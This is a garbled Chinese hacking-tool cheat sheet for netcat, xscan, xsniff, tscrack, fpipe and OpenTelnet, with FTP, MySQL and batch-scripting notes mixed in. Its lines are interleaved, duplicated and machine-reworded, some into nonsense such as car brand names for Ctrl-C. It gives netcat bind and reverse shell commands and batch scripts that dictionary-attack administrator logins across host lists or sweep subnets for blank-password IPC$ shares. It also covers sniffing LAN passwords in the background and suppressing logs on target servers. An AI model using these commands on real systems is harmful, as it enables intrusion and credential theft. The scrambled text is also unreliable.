    -e prog程序重定向,一但接二连三就执行[危急] 

      cd remote-dir 进入远程主机目录

    -d 后台形式 

    -i secs延时的距离 

      cdup 进入远程主机目录的父目录

    -e prog程序重定向,一但总是就施行[危急] 

    -l 监听格局,用于入站连接 

      ! 在地点机中实施交互shell,exit回到ftp处境,如!ls*.zip

    -i secs延时的距离 

    -L 监听情势,连接天闭后照旧雄起雌伏监听,直到CT景逸SUV C 

      #5

    -l 监听形式,用于入站连接 

    -n IP地址,不能够用域名 

      MYSQL 命令

    -L 监听方式,连接天闭后仍旧继续监听,直到CT智跑 C 

    -o film记录16进制的传输 

      mysql -h主机地址 -u用户名 -p密码 连接MYSQL;假诺刚安装好MYSQL,一级用户root是尚未密码的。

    -n IP地址,无法用域名 

    -p[空格]端口 本地端口号 

      (例:mysql -h110.110.110.110 -Uroot -P123456

    -o film记录16进制的传输 

    -r 随机本地及远程端口 

      注:u与root能够毫无加空格,其余也大同小异)

    -p[空格]端口 本地端口号 

    -t 使用Telnet交互格局 

      exit 退出MYSQL

    -r 随机本地及远程端口 

    -u UDP模式 

      mysqladmin -u用户名 -p旧密码 password 新密码 修改密码

    -t 使用Telnet交互格局 

    -v 详细输出,用-vv将更详细 

      grant select on 数据库.* to 用户名@登入主机 identified by "密码"; 增添新用户。(注意:和地点不一致,上边包车型地铁因为是MYSQL意况中的命令,所此前面都带贰个子公司作为命令甘休符)

    -u UDP模式 

    -w数字 timeout延时间隔 

      show databases; 呈现数据库列表。刚先河时才三个数据库:mysql和test。mysql库很入眼它当中有MYSQL的系统消息,大家改密码和新添用户,实际上正是用那几个库开始展览操作。

    -v 详细输出,用-vv将更详细 

    -z 将输入,输出关掉(用于扫锚时) 

      use mysql;

    -w数字 timeout延时间隔 

    中心用法: 

      show tables; 呈现库中的数据表

    -z 将输入,输出关掉(用于扫锚时) 

    nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 

      describe 表名; 突显数据表的布局

    主导用法: 

    nc -l -p 80 开启本机的TCP 80端口并监听 

      create database 库名; 建库

    nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 

    nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 

      use 库名;

    nc -l -p 80 开启本机的TCP 80端口并监听 

    nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 

      create table 表名 (字段设定列表); 建表

    nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 

    nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 

      drop database 库名;

    nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口 

    高档用法: 

      drop table 表名; 删库和删表

    nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 

    nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CT讴歌ZDX C停止 

      delete from 表名; 将表中著录清空

    高等用法: 

    nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTENVISION C,同时把结果输出到c:log.txt 

      select * from 表名; 展现表中的笔录

    nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTGL450 C结束 

    nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTSportage C,并把c:honeyport.txt中剧情送入管道中,亦可起到传送文件功效 

      mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下推行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,张开看看您会有新意识。

    nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTQX56 C,同期把结果输出到c:log.txt 

    type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CT福睿斯 C,并把c:honeyport.txt中剧情送入管道中,亦可起到传送文件成效 

      win二零零三系统下新添命令(实用部份):

    nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTENCORE C,并把c:honeyport.txt中剧情送入管道中,亦可起到传送文件成效 

    本机上用:nc -l -p 本机端口 

      shutdown /参数 关闭或重启本地或远程主机。

    type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTLAND C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件效率 

    在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K

      参数表达:/S 关闭主机,/马自达MX-5 重启主机, /T 数字 设定延时的光阴,范围0~180秒之内, /A撤消开机,/M //IP 钦命的长距离主机。

    本机上用:nc -l -p 本机端口 

    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 

      例:shutdown /r /t 0 立时重启本地主机(无延时)

    在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K

    本机上用:nc -d -l -p 本机端口 < 要传递的公文路线及名称 

      taskill /参数 进度名或进度的pid 终止多个或多少个任务和进程。

    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 

    在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的不二秘诀及称谓 传送文件到对方主机 

      参数表明:/PID 要停下进程的pid,可用tasklist命令获得各进程的pid,/IM 要甘休的经过的经过名,/F 强制结束进程,/T 终止钦点的历程及他所运维的子进度。

    本机上用:nc -d -l -p 本机端口 < 要传送的公文路线及名称 

    备 注: 

      tasklist 展现当前运维在本地和长途主机上的进程、服务、服务各进度的经过标识符(PID)。

    在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的门道及称号 传送文件到对方主机 

    | 管道命令 

      参数表达:/M 列出当前经过加载的dll文件,/SVC 展现出每一种进度对应的服务,无参数时就只列出脚下的长河。

    备 注: 

    < 或 > 重定向命令。"<",比方:tlntadmn < test.txt 指把test.txt的故事情节赋值给tlntadmn命令 

      Linux系统下中央命令 注:要区分轻重缓急写

    | 管道命令 

    @ 表示推行@前边的吩咐,但不会显得出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台试行dir,并把结果存在d:log.txt中 

      uname 展现版本新闻(同win2K的 ver)

    < 或 > 重定向命令。"<",比如:tlntadmn < test.txt 指把test.txt的剧情赋值给tlntadmn命令 

    >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。

      dir 呈现当前目录文件,ls -al 展现包蕴隐藏文件(同win2K的 dir)

    @ 代表实行@前边的下令,但不会来得出来(后台施行);例:@dir c:winnt >> d:log.txt 意思是:后台实行dir,并把结果存在d:log.txt中 

    如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个指令分别实施二回相比较看:用>>的则是把二遍的结果都保留了,而用:>则唯有一遍的结果,是因为第一遍的结果把第三回的掩盖了。

      pwd 查询当前所在的目录地点

    >与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。

    #8 八:

      cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /重临到根目录。

    如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt一个指令分别施行一遍相比看:用>>的则是把壹遍的结果都保留了,而用:>则唯有贰遍的结果,是因为第三次的结果把第贰回的覆盖了。

    2、扫锚工具:xscan.exe

      cat 文件名 查看文件内容

    #8 八:

    着力格式 

      cat >abc.txt 往abc.txt文件中写上内容。

    2、扫锚工具:xscan.exe

    xscan -host <起始IP>[-<终止IP>] <检验项目> [任何选项] 扫锚"起头IP到终止IP"段的有着主机音讯 

      more 文件名 以一页一页的章程展现二个文件文件。

    中央格式 

    xscan -file <主机列表文件名> <检查评定项目> [其他选项] 扫锚"主机IP列表文件名"中的全部主机新闻 

      cp 复制文件

    xscan -host <起始IP>[-<终止IP>] <检验项目> [任何选项] 扫锚"伊始IP到终止IP"段的富有主机消息 

    检查测试项目 

      mv 移动文件

    xscan -file <主机列表文件名> <检查实验项目> [其余选项] 扫锚"主机IP列表文件名"中的全部主机音信 

    -active 检查评定主机是还是不是存活 

      rm 文件名 删除文件,rm -a 目录名删除目录及子目录

    检验连串 

    -os 检验远程操作系统类型(通过NETBIOS和SNMP协议) 

      mkdir 目录名 创建目录

    -active 检验主机是或不是存活 

    -port 检查实验常用服务的端口状态 

      rmdir 删除子目录,目录内未有文书档案。

    -os 检查测量试验远程操作系统类型(通过NETBIOS和SNMP协议) 

    -ftp 检测FTP弱口令 

      chmod 设定档案或目录的存取权限

    -port 检验常用服务的端口状态 

    -pub 检查测量检验FTP服务无名氏用户写权限 

      grep 在档案中查找字符串

    -ftp 检测FTP弱口令 

    -pop3 检测POP3-Server弱口令 

      diff 档案文件相比

    -pub 检查评定FTP服务佚名用户写权限 

    -smtp 检测SMTP-Server漏洞 

      find 档案搜寻

    -pop3 检测POP3-Server弱口令 

    -sql 检测SQL-Server弱口令 

      date 现在的日期、时间

    -smtp 检测SMTP-Server漏洞 

    -smb 检测NT-Server弱口令 

      who 查询最近和您利用同样台机械的人以及Login时间地方

    -sql 检测SQL-Server弱口令 

    -iis 检查测试IIS编码/解码漏洞 

      w 查询方今上机者的详细资料

    -smb 检测NT-Server弱口令 

    -cgi 检测CGI漏洞 

      whoami 查看自身的帐号名称

    -iis 质量评定IIS编码/解码漏洞 

    -nasl 加载Nessus攻击脚本 

      groups 查看有些人的Group

    -cgi 检测CGI漏洞 

    -all 检验以上全数类型 

      passwd 改造密码

    -nasl 加载Nessus攻击脚本 

    别的选项 

      history 查看本人下过的通令

    -all 检查测试以上全体品类 

    -i 适配器编号 设置网络适配器, <适配器编号>可透过"-l"参数获取 

      ps 显示进程意况

    其它选项 

    -l 显示全体互连网适配器 

      kill 停止某进度

    -i 适配器编号 设置网络适配器, <适配器编号>可经过"-l"参数获取 

    -v 呈现详细扫描进程 

      gcc 黑客平常用它来编译C语言写的文本

    -l 呈现全部网络适配器 

    -p 跳过未有响应的主机 

      su 权限调换为钦点使用者

    -v 展现详细扫描进程 

    -o 跳过并未有检查测量试验到开放端口的主机 

      telnet IP telnet连接对方主机(同win2K),当出现bash$时就评释连接成功。

    -p 跳过未有响应的主机 

      -t 并发线程数量,并发主机数量 钦定最大并发线程数量和产出主机数量, 暗许数量为100,10 

      ftp ftp连接上某服务器(同win2K)

    -o 跳过并未有检查测量试验到开放端口的主机 

    -log 文件名 钦点扫描报告文本名 (后缀为:TXT或HTML格式的文书) 

      批管理命令与变量

      -t 并发线程数量,并发主机数量 内定最大并发线程数量和产出主机数量, 默许数量为100,10 

    用法示例 

      1:for命令及变量 基本格式

    -log 文件名 钦定扫描报告文本名 (后缀为:TXT或HTML格式的公文) 

    xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检查测量试验192.168.1.1-192.168.255.255网段内主机的全数漏洞,跳过无响应的主机 

      FOR /参数 %variable IN (set) DO command [command_parameters] %variable:钦赐贰个纯净字母可替换的参数,如:%i ,而钦定一个变量则用:%%i ,而调用变量时用:%i% ,变量是分别轻重缓急写的(%i 不等于 %I)。

    用法示例 

    xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检查评定192.168.1.1-192.168.255.255网段内主机的正统端口状态,NT弱口令用户,最大并发线程数量为150,跳过未有质量评定到开放端口的主机 

      批处理每一回能管理的变量从%0—%9共拾叁个,在那之中%0暗中同意给批管理文件名使用,%1默以为选用此批管理时输入的的率先个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

    xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检查评定192.168.1.1-192.168.255.255网段内主机的装有漏洞,跳过无响应的主机 

    xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检查测量检验"hostlist.txt"文件中列出的享有主机的规范端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检查测量检验5台主机,展现详细检查评定进度,跳过并未有检验到开放端口的主机 

      (set):内定三个或一组文件,可应用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指发轫值,第贰个"1"指增加量,第八个"254"指终结值,即:从1到254;“(1 -1 254)”表明:即从254到1 }

    xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检验192.168.1.1-192.168.255.255网段内主机的正统端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检验到开放端口的主机 

    3、命令市价势嗅探器: xsniff.exe

      command:钦命对第个文件实行的一声令下,如:net use命令;如要施行多少个指令时,命令那间加:& 来隔开分离

    xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检查实验"hostlist.txt"文件中列出的享有主机的科班端口状态,CGI漏洞,最大并发线程数量为200,同不常刻最多检查评定5台主机,突显详细检查实验进程,跳过并未有检验到开放端口的主机 

    可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

      command_parameters:为特定命令内定参数或命令行按钮

    3、命令行方式嗅探器: xsniff.exe

    参数表达 

      IN (set):指在(set)中取值;DO command :指执行command

    可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

    -tcp 输出TCP数据报 

      参数:/L 指用增量情势{ (set)为增量情势时 };/F 指从文件中每每取值,直到取完结束{ (set)为文件时,如(d:pass.txt)时 }。

    参数表达 

    -udp 输出UDP数据报 

      用法举个例子:

    -tcp 输出TCP数据报 

    -icmp 输出ICMP数据报 

      @echo off

    -udp 输出UDP数据报 

    -pass 过滤密码音信 

      echo 用法格式:test.bat *.*.* > test.txt

    -icmp 输出ICMP数据报 

    -hide 后台运转 

      for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%G /user:administrator | find "命令成功完毕" >>test.txt

    -pass 过滤密码消息 

    -host 解析主机名 

      存为test.bat 表达:对点名的三个C类网段的251个IP依次试创立administrator密码为空的IPC$连接,假如成功就把该IP存在test.txt中。

    -hide 后台运转 

    -addr IP地址 过滤IP地址 

      /L指用增量情势(即从1-254或254-1);输入的IP前边贰个人:*.*.*为批管理暗许的 %1;%%G 为变量(ip的最后一个人);& 用来隔离echo 和net use 那贰个指令;| 指创建了ipc$后,在结果中用find查看是或不是有"命令成功做到"音信;%1.%%G 为完整的IP地址;(1 1 254) 指发轫值,增加量,结止值。

    -host 深入分析主机名 

    -port 端口 过滤端口 

      @echo off

    -addr IP地址 过滤IP地址 

    -log 文件名 将出口保存到文件 

      echo 用法格式:ok.bat ip

    -port 端口 过滤端口 

    -asc 以ASCII格局出口 

      FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200

    -log 文件名 将出口保存到文件 

    -hex 以16进制方式出口 

      存为:ok.exe 表明:输入二个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完结束。%%i为用户名;%1为输入的IP地址(私下认可)。

    -asc 以ASCII情势出口 

    用法示例 

      七:

    -hex 以16进制情势出口 

    xsniff.exe -pass -hide -log pass.log 后台运转嗅探密码并将密码音信保存在pass.log文件中 

      2:if命令及变量 基本格式

    用法示例 

    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp消息并以ASCII格式输出 

      IF [not] errorlevel 数字 命令语句 假若程序运营最终回到多少个相当于或超过钦定数字的退出编码,钦赐条件为“真”。

    xsniff.exe -pass -hide -log pass.log 后台运维嗅探密码并将密码音讯保存在pass.log文件中 

    4、终端服务密码破解: tscrack.exe

      例:IF errorlevel 0 命令 指程序推行后重返的值为0时,就值行前面包车型大巴吩咐;IF not errorlevel 1 命令指程序实施最终回来的值不对等1,就施行后边的下令。

    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp音讯并以ASCII格式输出 

    参数表达 

      0 指开采并打响实行(真);1 指未有发现、没试行(假)。

    4、终端服务密码破解: tscrack.exe

    -h 彰显应用帮忙 

      IF [not] 字符串1==字符串2 命令语句 倘诺内定的文本字符串相称(即:字符串1 等于 字符串2),就实行前边的授命。

    参数表达 

    -v 呈现版本新闻 

      例:“if "%2%"=="4" goto start”指:若是输入的第3个变量为4时,实践后边的一声令下(注意:调用变量时就%变量名%并加" ")

    -h 展现采纳帮衬 

    -s 在荧屏上打出解密工夫 

      IF [not] exist 文件名 命令语句 即使钦赐的文件名存在,就施行后边的命令。

    -v 显示版本新闻 

    -b 密码错误时产生的声音 

      例:“if not nc.exe goto end”指:若无察觉nc.exe文件就跳到":end"标签处。

    -s 在显示屏上打出解密本事 

    -t 同是发出多个延续(三十二线程) 

      IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 发令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当后面的尺度不树马上,就指行else前面的一声令下。注意:else 必须与 if 在一样行才使得。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要独立一行时能力实施,用上< >后就非常是独自一行了;比方:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”

    -b 密码错误时发生的声音 

    -N Prevent System Log entries on targeted server 

      系统外界命令

    -t 同是发出多少个接二连三(十二线程) 

    -U 卸载移除tscrack组件 

      注:系统外界命令(均需下载相关工具)

    -N Prevent System Log entries on targeted server 

    -f 使用-f后边的密码 

      瑞士联邦军刀:nc.exe

    -U 卸载移除tscrack组件 

    -F 间隔时间(频率) 

      参数表达:

    -f 使用-f前边的密码 

    -l 使用-l前边的用户名 

      -h 查看协理音讯

    -F 间隔时间(频率) 

    -w 使用-w前边的密码字典 

      -d 后台格局

    -l 使用-l前面包车型客车用户名 

    -p 使用-p前边的密码 

      -e prog程序重定向,一但延续就进行[危险]

    -w 使用-w后边的密码字典 

    -D 登入主页面 

      -i secs延时的间距

    -p 使用-p前面的密码 

    用法示例 

      -l 监听情势,用于入站连接

    -D 登入主页面 

    tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登录密码 

      -L 监听形式,连接天闭后如故继续监听,直到CTENCORE C

    用法示例 

    tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登入192.168.0.1的administrator用户 

      -n IP地址,不能够用域名

    tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登录密码 

    @if not exist ipcscan.txt goto noscan 

      -o film记录16进制的传输

    tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登录192.168.0.1的administrator用户 

    @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i 

      -p[空格]端口 本地端口号

    @if not exist ipcscan.txt goto noscan 

    nscan 

      -r 随机本地及远程端口

    @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i 

    @echo 3389.txt no find or scan faild 

      -t 使用Telnet交互格局

    nscan 

    (①存为3389.bat) (假诺现存用SuperScan或任何扫锚器扫到一群开有3389的主机IP列表文件3389.txt) 

      -u UDP模式

    @echo 3389.txt no find or scan faild 

    3389.bat意思是:从3389.txt文件中取贰个IP,接着运维hack.bat 

      -v 详细输出,用-vv将更详尽

    (①存为3389.bat) (要是现成用SuperScan或此外扫锚器扫到一群开有3389的主机IP列表文件3389.txt) 

    @if not exist tscrack.exe goto noscan 

      -w数字 timeout延时间隔

    3389.bat意思是:从3389.txt文件中取贰个IP,接着运转hack.bat 

    @tscrack %1 -l administrator -w pass.dic >>rouji.txt 

      -z 将输入,输出关掉(用于扫锚时)

    @if not exist tscrack.exe goto noscan 

    :noscan 

      基本用法:

    @tscrack %1 -l administrator -w pass.dic >>rouji.txt 

    @echo tscrack.exe no find or scan faild 

      nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

    :noscan 

    (②存为hack.bat) (运营3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同多个目录下;就能够等待结果了) 

      nc -l -p 80 开启本机的TCP 80端口并监听

    @echo tscrack.exe no find or scan faild 

    hack.bat意思是:运营tscrack.exe用字典暴破3389.txt中持有主机的administrator密码,并将破解结果保存在rouji.txt文件中。 

      nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

    (②存为hack.bat) (运营3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个索引下;就能够等待结果了) 

    5、其它:

      nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

    hack.bat意思是:运营tscrack.exe用字典暴破3389.txt中享有主机的administrator密码,并将破解结果保存在rouji.txt文件中。 

    Shutdown.exe 

      nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

    5、其它:

    Shutdown \IP地址 t:20 20秒后将对方NT自动关闭(Windows 二零零一系统自带工具,在Windows3000下用进就得下载此工具能力用。在后面Windows 二〇〇二 DOS命令中有详尽介绍。) 

      高端用法:

    Shutdown.exe 

    fpipe.exe (TCP端口重定向工具) 在其次篇中有详尽表明(端口重定向绕过防火墙) 

      nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CT哈弗 C停止

    Shutdown \IP地址 t:20 20秒后将对方NT自动关闭(Windows 二〇〇〇种类自带工具,在Windows2000下用进就得下载此工具才具用。在眼下Windows 二〇〇〇 DOS命令中有详细介绍。) 

    fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会全盘是www.sina.com.cn的主机新闻 

      nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CT中华V C,同期把结果输出到c:log.txt

    fpipe.exe (TCP端口重定向工具) 在第二篇中有详细表达(端口重定向绕过防火墙) 

    Fpipe -l 23 -s 88 -r 23 指标IP 把本机向指标IP发送的23端口Telnet央求经端口重定向后,就透过88端口发送到指标IP的23端口。(与目的IP创建Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接受目的IP的23端口了。 

      nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CT途观 C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件效用

    fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全部都以www.sina.com.cn的主机消息 

    OpenTelnet.exe (远程开启telnet工具) 

      type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTLAND C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件成效

    Fpipe -l 23 -s 88 -r 23 指标IP 把本机向目的IP发送的23端口Telnet伏乞经端口重定向后,就透过88端口发送到目的IP的23端口。(与目的IP建构Telnet时本机就用的88端口与其相连接)然后:间接Telnet 127.0.0.1(本机IP)就连接受指标IP的23端口了。 

    opentelnet.exe \IP 帐号 密码 ntlm认证方法 Telnet端口 (无需上传ntlm.exe破坏微软的身份验证形式)间接远程开启对方的telnet服务后,就可用telnet \ip 连接上对方。

      本机上用:nc -l -p 本机端口

    OpenTelnet.exe (远程开启telnet工具) 

    NTLM认证方法:0:不使用NTLM身份验证;1:先品尝NTLM身份验证,若是战败,再利用用户名和密码;2:只行使NTLM身份验证。

      在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K

    opentelnet.exe \IP 帐号 密码 ntlm认证方法 Telnet端口 (无需上传ntlm.exe破坏微软的身份验证格局)直接远程开启对方的telnet服务后,就可用telnet \ip 连接上对方。

    ResumeTelnet.exe (OpenTelnet附带的另三个工具) 

      nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

    NTLM认证方法:0:不采用NTLM身份验证;1:先品尝NTLM身份验证,假若战败,再使用用户名和密码;2:只利用NTLM身份验证。

    resumetelnet.exe \IP 帐号 密码 用Telnet连接完对方后,就用那几个命令将对方的Telnet设置还原,并同期关闭Telnet服务。 

      本机上用:nc -d -l -p 本机端口 < 要传送的公文路线及称号

    ResumeTelnet.exe (OpenTelnet附带的另贰个工具) 

    6、FTP命令详解:

      在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的门道及称号 传送文件到对方主机

    resumetelnet.exe \IP 帐号 密码 用Telnet连接完对方后,就用这几个命令将对方的Telnet设置还原,并还要关闭Telnet服务。 

    FTP命令是Internet用户使用最频繁的下令之一,熟稔并灵活使用FTP的内部命令,能够大大有利使用者,并接收一石两鸟之效。假如您想上学应用举行后台FTP下载,那么就无法不学习FTP指令。

      备 注:

    6、FTP命令详解:

    FTP的命令行格式为: 

      | 管道命令

    FTP命令是Internet用户采纳最频仍的下令之一,熟知并灵活使用FTP的里边命令,能够大大方便使用者,并收到两全其美之效。借使您想学习应用进行后台FTP下载,那么就无法不学习FTP指令。

    ftp -v -d -i -n -g [主机名] ,其中

      < 或 > 重定向命令。“<”,比如:tlntadmn < test.txt 指把test.txt的剧情赋值给tlntadmn命令

    FTP的授命行格式为: 

    -v 突显远程服务器的具备响应音讯;

      @ 表示实行@前面包车型大巴授命,但不会议及展览示出来(后台推行);例:@dir c:winnt >> d:log.txt 意思是:后台推行dir,并把结果存在d:log.txt中

    ftp -v -d -i -n -g [主机名] ,其中

    -n 限制ftp的活动登陆,即不应用;.n etrc文件;

      >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。

    -v 展现远程服务器的具有响应新闻;

    -d 使用调节和测量试验格局;

      如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt一个指令分别推行一回相比较看:用>>的则是把二回的结果都封存了,而用:>则唯有三次的结果,是因为第二遍的结果把第贰遍的遮盖了。

    -n 限制ftp的自发性登陆,即不应用;.n etrc文件;

    -g 撤消全局文件名。

      八:

    -d 使用调节和测量检验格局;

    FTP使用的里边命令如下(中括号表示可挑选):

      扫描工具:xscan.exe

    -g 撤销全局文件名。

    1.![cmd[args]]:在地头机中施行交互shell,exit回到ftp境况,如:!ls*.zip 

      基本格式

     

    2.$ macro-ame[args]: 实行宏定义macro-name。

      xscan -host <起始IP>[-<终止IP>] <检查实验项目> [别的选用] 扫锚"开头IP到终止IP"段的持有主机新闻

    FTP使用的中间命令如下(中括号表示可挑选):

    3.account[password]: 提供登陆远程系统成功后走访系统能源所需的填补口令。 

      xscan -file <主机列表文件名> <检验种类> [其余采用] 扫锚"主机IP列表文件名"中的全体主机音信

    1.![cmd[args]]:在地面机中施行交互shell,exit回到ftp景况,如:!ls*.zip 

    4.append local-file[remote-file]:将地点文件扩展到长途系统主机,若未钦定远程系统文件名,则接纳当地文件名。

      检验种类

    2.$ macro-ame[args]: 实践宏定义macro-name。

    5.ascii:使用ascii类型传输格局。

      -active 检查实验主机是还是不是存活

    3.account[password]: 提供登陆远程系统成功后走访系统财富所需的补给口令。 

    6.bell:每一个命令实施完结后Computer响铃一遍。

      -os 检查评定远程操作系统类型(通过NETBIOS和SNMP协议)

    4.append local-file[remote-file]:将当守田件扩展到长途系统主机,若未钦命远程系统文件名,则选取当三步跳件名。

    7.bin:使用二进制文件传输格局。

      -port 检验常用服务的端口状态

    5.ascii:使用ascii类型传输格局。

    8.bye:退出ftp会话进度。

      -ftp 检测FTP弱口令

    6.bell:每一种命令实践达成后Computer响铃一遍。

    9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。 

      -pub 检查评定FTP服务无名用户写权限

    7.bin:使用二进制文件传输方式。

    10.cd remote-dir:进入远程主机目录。

      -pop3 检测POP3-Server弱口令

    8.bye:退出ftp会话进程。

    11.cdup:进入远程主机目录的父目录。 

      -smtp 检测SMTP-Server漏洞

    9.case:在选择mget时,将长途主机文件名中的大写转为小写字母。 

    12.chmod mode file-name:将远程主机文件file-name的存取格局设置为mode,如:chmod 777 a.out。

      -sql 检测SQL-Server弱口令

    10.cd remote-dir:进入远程主机目录。

    13.close:中断与远程服务器的ftp会话(与open对应)。 

      -smb 检测NT-Server弱口令

    11.cdup:进入远程主机目录的父目录。 

    14.cr:使用asscii形式传输文件时,将回车换行转变为回行。

      -iis 检验IIS编码/解码漏洞

    12.chmod mode file-name:将长途主机文件file-name的存取格局设置为mode,如:chmod 777 a.out。

    15.delete remote-file:删除远程主机文件。 

      -cgi 检测CGI漏洞

    13.close:中断与远程服务器的ftp会话(与open对应)。 

    16.debug[debug-value]:设置调节和测验格局, 呈现发送至远程主机的每条命令,如:deb up 3,若设为0,表示撤废debug。

      -nasl 加载Nessus攻击脚本

    14.cr:使用asscii格局传输文件时,将回车换行转变为回行。

    17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入当三步跳件。 

      -all 检查测量试验以上全数品种

    15.delete remote-file:删除远程主机文件。 

    18.disconnection:同close。

      其余选项

    16.debug[debug-value]:设置调节和测量检验格局, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示撤废debug。

    19.form format:将文件传输格局设置为format,缺省为file情势。 

      -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取

    17.dir[remote-dir][local-file]:展现远程主机目录,并将结果存入本半夏件。 

    20.get remote-file[local-file]: 将长途主机的文本remote-file传至本地硬盘的local-file。

      -l 彰显全体网络适配器

    18.disconnection:同close。

    21.glob:设置mdelete,mget,mput的文件名扩张,缺省时不增添文件名,同命令行的-g参数。 

      -v 显示详细扫描进度

    19.form format:将文件传输方式设置为format,缺省为file格局。 

    22.hash:每传输1024字节,显示一个hash符号(#)。

      -p 跳过未有响应的主机

    20.get remote-file[local-file]: 将远程主机的文书remote-file传至本地硬盘的local-file。

    23.help[cmd]:展现ftp内部命令cmd的帮扶新闻,如:help get24.idle[seconds]:将远程服务器的休眠电火花计时器设为[seconds]秒。

      -o 跳过未有检验到开放端口的主机

    21.glob:设置mdelete,mget,mput的文件名扩充,缺省时不扩展文件名,同命令行的-g参数。 

    25.image:设置二进制传输格局(同binary)。 

      -t 并发线程数量,并发主机数量 内定最大并发线程数量和出现主机数量, 默许数量为100,10

